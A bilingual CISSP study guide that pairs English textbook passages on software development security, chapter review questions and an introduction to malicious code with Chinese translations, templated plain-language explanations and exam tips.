teams (IPTs) are an early effort at this approach that was used by the U.S. Department of Defense. Describe software development maturity models. Know that maturity models help software organizations improve the maturity and quality of their software processes by implementing an evolutionary path from ad hoc, chaotic processes to mature, disciplined software processes. Be able to describe the SW-CMM, IDEAL, and SAMM models. Understand the importance of change and configuration management. Know the three basic components of the change management process—request control, change control, and release control— and how they contribute to security.

Explain how software configuration management controls the versions of software used in an organization. Understand how the auditing and logging of changes mitigates risk to the organization. Understand the importance of testing. Software testing should be designed as part of the development process. Testing should be used as a management tool to improve the design, development, and production processes. Explain the role of DevOps and DevSecOps in the modern enterprise. DevOps approaches seek to integrate software development and operations activities by embracing automation and collaboration between teams.

DevSecOps approaches expand on the DevOps model by introducing security operations activities into the integrated model. Continuous integration and delivery (CI/CD) techniques automate the DevOps and DevSecOps pipelines. Know the role of different coding tools in software development ecosystems. Developers write code in different programming languages, which is then either compiled into machine language or executed through an interpreter. Developers may make use of software development tool sets and integrated development environments to facilitate the code writing process.

Software libraries create shared and reusable code, whereas code repositories provide a management platform for the software development process. Explain the impact of acquired software on the organization. Organizations may purchase commercial off-the-shelf (COTS) software to meet their requirements, and they may also rely on free open-source software (OSS). All of this software expands the potential attack surface and requires security review and testing.

中文直译 / 整理

团队(IPTs)是美国国防部早期采用这种做法的尝试。 描述软件开发成熟度模型。 了解成熟度模型如何通过实施从随意、混乱的流程 到成熟、规范的软件流程的演进路径,帮助软件组织提升其软件过程的成熟度 和质量。 能够描述SW‑CMM、IDEAL和SAMM模型。 理解变更和配置的重要性 管理。 了解变更管理过程的三个基本组成部分——请求控制、变更控制和发布 控制——以及它们如何促进安全性。 解释软件配置管理如何控制组织中使用的软 件版本。 理解变更的审计和日志记录如何降低组织的风险。 理解测试的重要性。 软件测试应作为开发过程的一部分进行设计。 测试应 作为管理工具,用于改进设计、开发和生产过程。 解释DevOps和DevSecOps在现代 企业中的作用。 DevOps方法通过采用团队间的自动化和协作,力求整合软件开 发与运维活动。 DevSecOps方法在DevOps模型的基础上,将安全运维活动引入 集成模型中。 持续集成与交付(CI/CD)技术自动化了DevOps和DevSecOps流 程。 了解不同编码工具在软件开发生态系统中的作用。 开发人员使用不同的编程语 言编写代码,这些代码要么被编译成机器语言,要么通过解释器执行。

开发人员 可能会使用软件开发工具集和集成开发环境来促进编码过程。 软件库创建可共享 和可重用的代码,而代码仓库则为软件开发过程提供管理平台。 解释采购软件对组织的影响。 组织可能购买商用现成(COTS)软件以满足其需求,也可能依赖免费的开源软 件(OSS)。 所有这些软件都会扩大潜在的攻击面,需要进行安全审查和测试。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1389 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

网络题先定位层次,再判断协议、设备或攻击位置。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
开发安全运营一体化 DevSecOps 把安全自动化嵌入开发和交付流程。
学习单元 67 / PDF P1390

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Written Lab 1. What is the main purpose of a primary key in a database table? 2. What is polyinstantiation? 3. Explain the difference between supervised and unsupervised machine learning. Review Questions 1. Christine is helping her organization implement a DevOps approach to deploying code. Which one of the following is not a component of the DevOps model? A. Information security B. Software development C. Quality assurance D. IT operations 2. Bob is developing a software application and has a field where users may enter a date. He wants to ensure that the values provided by the users are accurate dates to prevent security issues. What technique should Bob use? A. Polyinstantiation B.

Input validation C. Contamination D. Screening 3. Vincent is a software developer who is working through a backlog of change tasks. He is not sure which tasks should have the highest priority. What portion of the change management process would help him to prioritize tasks? A. Release control B. Configuration control C. Request control D. Change audit

中文直译 / 整理

实验题 1. 数据库表中主键的主要作用是什么? 2. 什么是多实例化? 3. 解释监督学习和无监督学习之间的区别。 复习题 1. 克里斯汀正在帮助她的组织实施DevOps方法来部署代码。 以下哪一项 是不属于DevOps模型的组成部分? A. 信息安全 B. 软件开发 C. 质量保证 D. IT 运营 2. 鲍勃正在开发一个软件应用程序,其中有一个字段供用户输入日期。 他希 望确保用户提供的值是准确的日期,以防止安全问题。 鲍勃应该使用什么技 术? A. 多实例化 B. 输入验证 C. 污染 D. 筛选 3. 文森特是一名软件开发人员,正在处理一系列待完成的变更任务。 他不确 定哪些任务应该具有最高优先级。 变更管理流程的哪一部分能帮助他确定任 务的优先级? A. 发布控制 B. 配置控制 C. 请求控制 D. 变更审计

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 68 / PDF P1391

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

4. Frank is conducting a risk analysis of his software development environment and, as a mitigation measure, would like to introduce an approach to failure management that places the system in a high level of security in the event of a failure. What approach should he use? A. Fail-open B. Fail mitigation C. Fail-secure D. Fail-clear 5. What software development model uses a seven-stage approach with a feedback loop that allows progress one step backward? A. Boyce-Codd B. Iterative waterfall C. Spiral D. Agile 6. Jane is conducting a threat assessment using threat modeling techniques as she develops security requirements for a software package her team is developing.

Which business function is she engaging in under the Software Assurance Maturity Model? A. Governance B. Design C. Implementation D. Verification 7. Which one of the following key types is used to enforce referential integrity between database tables? A. Candidate key B. Primary key C. Foreign key D. Alternate key 8. Richard believes that a database user is misusing his privileges to gain information about the company's overall business trends by issuing 4.

中文直译 / 整理

弗兰克正在对其软件开发环境进行风险分析,并希望作为缓解措施,引入 一种故障管理方法,使系统在发生故障时处于高度安全状态。 他应该使用哪 种方法? A. 失效开放 B. 失效缓解 C. 失效安全 D. 失效清除 5. 哪种软件开发模型采用七阶段方法,并包含一个允许向后退一步的反馈循环? A. Boyce‑Codd B. 迭代式瀑布模型 C. 螺旋模型 D. 敏捷 6. 简在为其团队开发的软件包制定安全需求时,正在使用威胁建模技术进行 威胁评估。 根据软件保障成熟度模型,她正在参与哪项业务职能? A. 治理 B. 设计 C. 实现 D. 验证 7. 以下哪种键类型用于在数据库表之间强制执行引用完整性? A. 候选键 B. 主键 C. 外键 D. 替代键 8. 理查德认为,数据库用户正在滥用其权限,通过发出

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

越早做威胁建模,修复成本越低。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
学习单元 69 / PDF P1392

第 1392 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

queries that combine data from a large number of records. What process is the database user taking advantage of? A. Inference B. Contamination C. Polyinstantiation D. Aggregation 9. What database technique can be used to prevent unauthorized users from determining classified information by noticing the absence of information normally available to them? A. Inference B. Manipulation C. Polyinstantiation D. Aggregation 10. Which one of the following is not a principle of Agile development? A. Satisfy the customer through early and continuous delivery. B. Businesspeople and developers work together. C. Pay continuous attention to technical excellence. D.

Prioritize security over other requirements. 11. What type of information is used to form the basis of an expert system's decision-making process? A. A series of weighted layered computations B. Combined input from a number of human experts, weighted according to past performance C. A series of “if/then” rules codified in a knowledge base D. A biological decision-making process that simulates the reasoning process used by the human mind 12. In which phase of the SW-CMM does an organization use quantitative measures to gain a detailed understanding of the development process? A. Initial B. Repeatable

中文直译 / 整理

结合大量记录数据的查询。 数据库用户正在利用什么过程? A. 推断 B. 污染 C. 多实例化 D. 聚合 9. 可以使用哪种数据库技术来防止未经授权的用户通过注意到他们通常 可获得的信息的缺失来推断机密信息? A. 推理 B. 操纵 C. 多实例化 D. 聚合 10. 以下哪一项不是敏捷开发的原则? 不 A. 通过早期和持续交付满足客户。 B. 商业人员和开发人员共同工作。 C. 持续关注技术卓越。 D. 将安全置于其他需求之上。 11. 哪种类型的信息用于构成专家系统决策过程的基础? A. 一系列加权的分层计算 B. 来自多位人类专家的综合输入,并根据过去的表现进行加权 C. 一组编码在知识库中的“如果/那么”规则 D. 一种模拟人类思维推理过程的生物决策过程 12. 在SW‑CMM的哪个阶段,组织使用定量指标来深入了解开发过程? A. 初始级 B. 可重复级

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

分层:分层把控制按层排列,让攻击者必须连续突破。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1392 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
分层 分层把控制按层排列,让攻击者必须连续突破。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 70 / PDF P1393

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

C. Defined D. Managed 13. Which of the following acts as a proxy between an application and a database to support interaction and simplify the work of programmers? A. SDLC B. ODBC C. PCI DSS D. Abstraction 14. In what type of software testing does the tester have access to the underlying source code? A. Static testing B. Dynamic testing C. Cross-site scripting testing D. Black-box testing 15. What type of chart provides a graphical illustration of a schedule that helps to plan, coordinate, and track project tasks? A. Gantt B. Venn C. Bar D. PERT 16. Which database security risk occurs when data from a higher classification level is mixed with data from a lower classification level? A.

Aggregation B. Inference C. Contamination D. Polyinstantiation 17. Tonya is performing a risk assessment of a third-party software package for use within her organization. She plans to purchase a product from a vendor that is very popular in her industry. What term best describes this software? C.

中文直译 / 整理

已定义 D. 已管理 13. 以下哪项充当应用程序与数据库之间的代理,以支持交互并简化程序员的工 作? A. SDLC B. ODBC C. PCI DSS D. 抽象 14. 在哪种软件测试中,测试人员可以访问底层源代码? A. 静态测试 B. 动态测试 C. 跨站脚本测试 D. 黑盒测试 15. 哪种图表以图形方式展示进度计划,有助于规划、协调和跟踪项目任务? A. 甘特图 B. 文恩图 C. 柱状图 D. PERT图 16. 当较高密级的数据与较低密级的数据混合时,会发生哪种数据库安全风险? A. 聚合 B. 推断 C. 污染 D. 多实例化 17. 托尼娅正在对其组织内使用的第三方软件包进行风险评估。 她计划从其行 业中非常流行的供应商处购买一款产品。 哪个术语最能描述这种软件?

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

程序:程序是一步一步怎么做。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

对象、角色、组、接口都可能体现 abstraction。

信用卡/持卡人数据场景优先想到 PCI DSS。

Step-by-step、SOP 常对应 procedure。

安全越早进入 SDLC,修复成本越低。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
程序 程序是一步一步怎么做。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
学习单元 71 / PDF P1394

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A. Open-source B. Custom-developed C. ERP D. COTS 18. Which one of the following is not part of the change management process? A. Request control B. Release control C. Configuration audit D. Change control 19. What transaction management principle ensures that two transactions do not interfere with each other as they operate on the same data? A. Atomicity B. Consistency C. Isolation D. Durability 20. Tom built a database table consisting of the names, telephone numbers, and customer IDs for his business. The table contains information on 30 customers. What is the degree of this table? A. Two B. Three C. Thirty D. Undefined A.

中文直译 / 整理

开源 B. 自定义开发 C. ERP D. COTS 18. 以下哪一项不属于变更管理流程? A. 请求控制 B. 释放控制 C. 配置审计 D. 变更控制 19. 哪种事务管理原则确保两个事务在操作相同数据时不会相互干扰? A. 原子性 B. 一致性 C. 隔离 D. 耐久性 20. 汤姆为他的业务构建了一个数据库表,包含姓名、电话号码和客户ID。 该 表包含30位客户的信息。 这个表的度是多少? A. 二 B. 三 C. 三十 D. 未定义

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

检测是 IDS,主动阻断更像 IPS。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
审计 审计检查控制是否存在、是否有效、是否符合要求。
第 21 章 · P1395-1579 · 185 个学习单元

恶意代码和应用攻击

OSG10 · Chapter 21 · Malicious Code and Application Attacks · 全文覆盖 + 小白精读 + 画报

第 21 章:恶意代码和应用攻击

这不是提炼版。本页按 PDF 第 1395-1579 页连续覆盖第 21 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

185个连续学习单元
4格原文 / 直译 / 解释 / 考点
185页覆盖第21章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1395

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 21 Malicious Code and Application Attacks THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.7 Understand methods of cryptanalytic attacks 3.7.13 Ransomware Domain 7.0: Security Operations 7.2 Conduct logging and monitoring activities 7.2.7 User and Entity Behavior Analytics (UEBA) 7.7 Operate and maintain detection and preventative measures 7.7.7 Anti-malware Domain 8.0: Software Development Security 8.2 Identify and apply security controls in software development ecosystems 8.3 Assess the effectiveness of software security 8.3.2 Risk analysis and mitigation 8.5 Define and apply secure coding guidelines and standards 8.5.1 Security weaknesses and vulnerabilities at the sourcecode level In Chapter 20, “Software Development Security,” you learned about secure software development techniques and the importance of building code that is resilient to attack.

In some cases, malicious software developers use their skills to develop malicious software (malware) that carries out unauthorized activity. Other experts may use their knowledge of application security to attack client-based and web-based applications. It's crucial that information security professionals understand these risks.

中文直译 / 整理

第21章 恶意代码和应用程序攻击 本章涵盖的CISSP主题包括: 领域3.0:安全架构与工程 3.7 理解密码分析攻击的方法 3.7.13 勒索软件 域 7.0:安全运营 7.2 执行日志记录和监控活动 7.2.7 用户和实体行为分析(UEBA) 7.7 操作和维护检测与预防措施 7.7.7 反恶意软件 域 8.0:软件开发安全 8.2 识别并应用软件开发生态系统中的安全控制措施 8.3 评估软件安全性 8.3.2 风险分析与缓解 8.5 定义并应用安全编码指南和标准 8.5.1 源代码级别的安全弱点和漏洞 在 第20章,“软件开发安全”中,您学习了安全软件开发技术以及构建抗攻 击代码的重要性。 在某些情况下,恶意软件开发人员会利用他们的技能开发执 行未经授权活动的恶意软件(恶意软件)。 其他专家可能利用他们对应用安全 的知识来攻击基于客户端和基于Web的应用程序。 信息安全部门的专业人员必 须了解这些风险。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 02 / PDF P1396

第 1396 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

This material is not only critical for the CISSP exam; it's also some of the most basic information a computer security professional must understand to effectively practice their trade. We'll begin this chapter by looking at the risks posed by malicious code objects—viruses, worms, logic bombs, and Trojan horses. We'll then take a look at some of the other security exploits used by someone attempting to gain unauthorized access to a system or to prevent legitimate users from gaining such access.

Malware Malware includes a broad range of software threats that exploit various network, operating system, software, and physical security vulnerabilities to spread malicious payloads to computer systems. Some malicious code objects, such as computer viruses and Trojan horses, depend on uninformed or irresponsible computer use by humans in order to spread from system to system with any success. Other objects, such as worms, spread rapidly among vulnerable systems under their own power.

All information security practitioners must be familiar with the risks posed by the various types of malicious code objects so that they can develop adequate countermeasures to protect the systems under their care as well as implement appropriate responses if their systems are compromised. Before we dive into the different types of malicious code that exist in the world, it's important to recognize that these distinctions have very blurry lines. It's quite common for the same piece of malware to exhibit characteristics from several different categories, making it difficult to fit malware into distinct buckets. Sources of Malicious Code Where does malicious code come from?

In the early days of computer security, malicious code writers were extremely skilled (albeit misguided) software developers who took pride in carefully crafting innovative malicious code techniques. Indeed, they actually served a somewhat useful function by exposing security holes in popular software packages and operating systems, raising the security awareness of the computing community. For an example

中文直译 / 整理

该材料不仅对CISSP考试至关重要,而且也是计算机安全专业人员有效开展工 作必须理解的最基本信息之一。 本章我们将首先探讨恶意代码对象——病毒、 蠕虫、逻辑炸弹和特洛伊木马——所带来的风险。 随后,我们将考察其他一些 被试图非法访问系统或阻止合法用户访问系统的攻击者所使用的安全漏洞。 恶意软件 恶意软件包括一系列广泛存在的软件威胁,它们利用各种网络、操作系统、软 件和物理安全漏洞,将恶意负载传播到计算机系统中。 一些恶意代码对象,例 如计算机病毒和特洛伊木马,需要人类的无知或不负责任的计算机使用行为才 能成功地在系统间传播。 而其他对象,如蠕虫,则能够凭借自身能力在易受攻 击的系统间迅速传播。 所有信息安全从业者都必须熟悉各种恶意代码对象所带来的风险,以便制定充 分的应对措施来保护其所负责的系统,并在系统遭受入侵时实施适当的响应。 在深入了解世界上存在的各种恶意代码类型之前,重要的是要认识到 这些分类之间的界限非常模糊。 同一段恶意代码通常会表现出多个不同类 别的特征,因此很难将恶意代码明确归入单一类别。 恶意代码的来源 恶意代码来自何处?

在计算机安全的早期,恶意代码编写者是极其熟练(尽管 misguided)的软件开发人员,他们以精心设计创新的恶意代码技术为荣。 事 实上,他们通过揭示流行软件包和操作系统中的安全漏洞,在一定程度上发挥 了有益的作用,提高了计算社区的安全意识。 例如

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1396 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 03 / PDF P1397

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

of this type of code writer, see the sidebar “RTM and the Internet Worm,” later in this chapter. Modern times have given rise to the script kiddie—the malicious individual who doesn't understand the technology behind security vulnerabilities but downloads ready-to-use software (or scripts) from the Internet and uses them to launch attacks against remote systems. This trend has given birth to a new breed of virus-creation software that allows anyone with a minimal level of technical expertise to create a virus and unleash it upon the Internet. This is reflected in the large number of viruses documented by antivirus experts to date.

The amateur malicious code developers are usually just experimenting with a new tool they downloaded or attempting to cause problems for one or two enemies. Unfortunately, the malware sometimes spreads rapidly and creates problems for internet users in general. In addition, the tools used by script kiddies are freely available to those with more sinister criminal intent. Indeed, international organized crime syndicates are known to play a role in malware proliferation. These criminals, located in countries with weak law enforcement mechanisms, use malware to steal the money and identities of people from around the world, especially residents of the United States.

In fact, the Zeus Trojan horse was widely believed to be the product of an Eastern European organized crime ring seeking to infect as many systems as possible to log keystrokes and harvest online banking passwords. Zeus first surfaced in 2007 but continues to be updated and found in new variants today. The most recent trend in malware development comes with the rise of the advanced persistent threat (APT). APTs are sophisticated adversaries with advanced technical skills and significant financial resources. These attackers are often military units, intelligence agencies, or shadowy groups that are likely affiliated with government agencies.

One of the key differences between APT attackers and other malware authors is that these malware developers often have access to zero-day exploits that are not known to software vendors. Because the vendor is not aware of the vulnerability, there is no patch, and the exploit is highly effective. Malware built by APTs is highly targeted, designed to impact only a small number of adversary systems (often as small as one), and difficult to defeat. You'll read later in this chapter about Stuxnet, one example of APT-developed malware. Viruses

中文直译 / 整理

